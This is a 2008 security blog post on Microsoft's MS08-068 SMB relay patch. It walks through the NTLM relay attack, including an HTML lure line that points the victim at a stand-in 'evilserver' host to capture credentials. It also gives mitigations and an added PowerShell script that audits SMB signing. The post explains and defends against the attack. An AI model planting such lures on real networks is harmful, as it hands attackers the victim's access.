Archive for November, 2008

Reflections on the November 2008 Microsoft patch release

Two security bulletins released today. One Critical, one rated Important. I find the ‘Important’ bulletin far more interesting this month.

From what I can tell, it appears that MS08-068 (Important) addresses a vulnerability that was first made public 7+ years ago (in 2001). Sir Dystic, from Cult of the Dead Cow, found a vulnerability in Microsoft operating systems that gave attackers complete access to users’ computers. He wrote a utility called SMBRelay to demonstrate the flaw. Microsoft was aware of the issue but didn’t issue any security bulletins or patches to correct the behavior. Well, it looks like they’ve finally seen the light and have addressed this issue via the MS08-068 patch.

To highlight how this works, here’s an example: The attacker and the victim are on the same corporate network. The victim’s firewall either allows file and printer sharing services through, or the firewall has been turned off entirely.

The attacker sends the victim an HTML email (or convinces them to visit their website) where the HTML code includes a reference like: <file://evilserver/picture.jpg>. When the victim machine goes to view this HTML, it attempts to display the ‘picture’ jpg. To do this, it needs to connect to the evilserver machine over NetBIOS ports. The evilserver machine asks the victim machine to authenticate to it, so it can then serve up the picture.jpg file. The victim machine performs the NTLM challenge-response authentication process in order to connect to evilserver and get this picture file. Whether the authentication succeeds or fails, it’s already too late. The evil server now has challenge-response data that it can relay back to the victim’s machine – allowing the attacker to simply connect to the victim’s machine without providing any password at all. The attacker has the same credentials as the user had on their system and can read and write files, modify the registry, delete objects, access emails, etc.

I used to demonstrate this attack in classroom training events around the country. It was very eye-opening for people to see a very easy-to-use exploit that could result in accessing anyone’s computer on their network. That this had been acknowledged by Microsoft in 2001 but never fixed was an equally eye-opening bit of news for the classroom participants.

This is a pretty scary attack that should keep IT managers up at night until it’s fully patched. “How do I know I haven’t already been hacked with this exploit?” “Who’s been accessing my computer without my password?” “Well, you don’t really know. Anyone with a computer on a typical corporate network and a copy of Sir Dystic’s SMBRelay exploit has probably already been on your computer and you’d never know.”

To fix the issue, apply the patch. Or, enable SMB signing on all your NetBIOS communication (something Microsoft recommended in 2001 when this issue was first raised). Or, enable personal firewalls on all machines and disable the Server service. This is certainly another good excuse to block inbound and outbound NetBIOS access at your corporate firewalls if you aren’t already.
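As an added example (not part of the original post), here is a PowerShell audit of the SMB signing mitigation described above: it reads the client- and server-side signing settings from the registry, reports whether signing is merely enabled or actually required, and optionally enforces it. It assumes PowerShell 5 or later run from an elevated prompt; the `-Enforce` switch name is chosen here and is not a Windows built-in.

```powershell
# Audit (and optionally enforce) SMB signing on the local host.
# Added example, not code from the original post. Run elevated.
param([switch]$Enforce)   # hypothetical switch: set RequireSecuritySignature=1

# Real registry locations used by the "Digitally sign communications" policies.
$paths = [ordered]@{
    'Server (LanmanServer)'      = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    'Client (LanmanWorkstation)' = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
}

foreach ($role in $paths.Keys) {
    $p = $paths[$role]
    $require = (Get-ItemProperty -Path $p -Name RequireSecuritySignature -ErrorAction SilentlyContinue).RequireSecuritySignature
    $enable  = (Get-ItemProperty -Path $p -Name EnableSecuritySignature  -ErrorAction SilentlyContinue).EnableSecuritySignature

    # Relay is only defeated when signing is REQUIRED. "Enabled" alone lets the
    # session negotiate down to unsigned when the peer does not sign.
    if ($require -eq 1) { $status = 'REQUIRED (relay-resistant)' }
    elseif ($enable -eq 1) { $status = 'enabled but optional (still relayable)' }
    else { $status = 'off (relayable)' }

    Write-Output ("{0,-28} Require={1} Enable={2} -> {3}" -f $role, $require, $enable, $status)

    if ($Enforce -and $require -ne 1) {
        Set-ItemProperty -Path $p -Name EnableSecuritySignature  -Value 1 -Type DWord
        Set-ItemProperty -Path $p -Name RequireSecuritySignature -Value 1 -Type DWord
        Write-Output "  -> RequireSecuritySignature set to 1 under $p (restart the service or reboot to apply)"
    }
}

# Second mitigation from the post: a host that never serves shares can have the
# Server service disabled so inbound SMB connections are refused outright.
$srv = Get-Service -Name LanmanServer
Write-Output ("Server service (LanmanServer): {0}, startup type {1}" -f $srv.Status, $srv.StartType)
```

On a domain, the same values are normally driven by Group Policy, so set them there rather than per host or the next policy refresh may revert a manual change.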

Regarding MS08-069, this is a Critical vulnerability in the Microsoft MSXML parser that ships both in the OS and in most Office products. Visit the wrong website or open a malicious document and you’re hacked. Nuff said. Apply the patch.
